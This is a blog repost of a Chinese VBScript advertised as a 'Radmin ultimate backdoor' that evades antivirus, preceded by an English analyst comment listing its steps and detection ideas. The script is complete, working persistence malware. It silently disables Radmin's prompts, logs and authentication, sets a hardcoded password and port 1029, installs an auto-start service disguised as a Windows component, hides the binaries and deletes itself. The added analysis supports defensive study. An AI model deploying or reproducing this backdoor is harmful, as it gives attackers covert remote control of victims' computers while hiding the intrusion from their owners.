  • Vbs脚本实现radmin终极后门

    ' Analyst note (defensive reading; the script text below is reproduced unchanged).
    ' What the script does, in the order it appears:
    '   1. Through WMI StdRegProv it creates HKLM\SYSTEM\RAdmin\v2.0\Server\iplist and
    '      HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters.
    '   2. Under ...\Parameters it writes AskUser, AutoAllow, EnableEventLog, EnableLogFile,
    '      FilterIp and NTAuthEnabled as 0,0,0,0 and DisableTrayIcon as 1,0,0,0. Judging by
    '      the value names, that turns off the connection prompt, both logs, IP filtering and
    '      NT authentication and hides the tray icon (confirm against the Radmin 2.x docs).
    '   3. It writes a fixed 16-byte "Parameter" value (the author's inline note calls it the
    '      Radmin password taken from a registry export), "Port" = 5,4,0,0 (0x0405 = 1029,
    '      little-endian, matching the inline note), "Timeout" = 10,0,0,0 and
    '      LogFilePath = c:\logfile.txt.
    '   4. It runs sc.exe with window style 0 (hidden) to create the auto-start service
    '      "WinManageHelp" pointing at %systemroot%\system32\Exporer.exe, then writes
    '      Description / DisplayName / ImagePath under
    '      SYSTEM\ControlSet001\Services\WinManageHelp with text that imitates a Windows component.
    '   5. It starts the service, sets read-only + hidden + system on exporer.exe, AdmDll.dll
    '      and raddrv.dll in system32, and finally deletes the script file.
    ' "on error resume next" suppresses every runtime error, so a partial run leaves no message.
    ' The script never copies the three binaries itself; presumably they are placed on the
    ' host by some other step that this page does not show.
    ' Risk: the credential value and port are published here, so a host carrying this exact
    ' configuration should be treated as fully compromised, not merely misconfigured.
    ' Detection ideas drawn from the artifacts above:
    '   - service-install records (Service Control Manager event 7045 in the System log, or
    '     4697 in the Security log when audited) naming WinManageHelp or an image path
    '     ending in Exporer.exe;
    '   - wscript.exe / cscript.exe launching sc.exe, net.exe or attrib.exe;
    '   - creation of or writes to HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters, especially with
    '     DisableTrayIcon set and both logging values cleared;
    '   - hidden + system files with the three names above in system32, and an unexpected
    '     listener on port 1029.
    ' Response: stop and delete the service, remove the files and the RAdmin key, and then
    ' establish how the script and the binaries reached the host.
    在网上看到N多人做radmin后门,要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用,希望大家喜欢。 on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ strComputer & "\root\default:StdRegProv") strKeyPath = "SYSTEM\RAdmin" oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\RAdmin\v2.0" oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\RAdmin\v2.0\Server" oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist" oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv") strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary) uBinary = Array(1,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary) uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)         //此为注册表导出十六进制转为十进制数据 pass:241241241 Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)     //Radmin密码 uBinary = Array(5,4,0,0)       //端口:1029 Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary) uBinary = Array(10,0,0,0) Return = 
objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary) Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv") strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" strValueName = "LogFilePath" strValue = "c:\logfile.txt" set wshshell=createobject ("wscript.shell") a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0) oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv") strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp" strValueName = "Description" strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers." oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName = "DisplayName" strValue = "Windows Management Instrumentation Player Drivers" oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName = "ImagePath" strValue = "c:\windows\system32\Exporer.exe /service" oreg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue set wshshell=createobject ("wscript.shell") a=wshshell.run ("net start WinManageHelp",0) b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0) c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0) d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0) CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)     //自删除   -------   from www.hack58.com
  • 原文地址:https://www.cnblogs.com/adodo1/p/4327852.html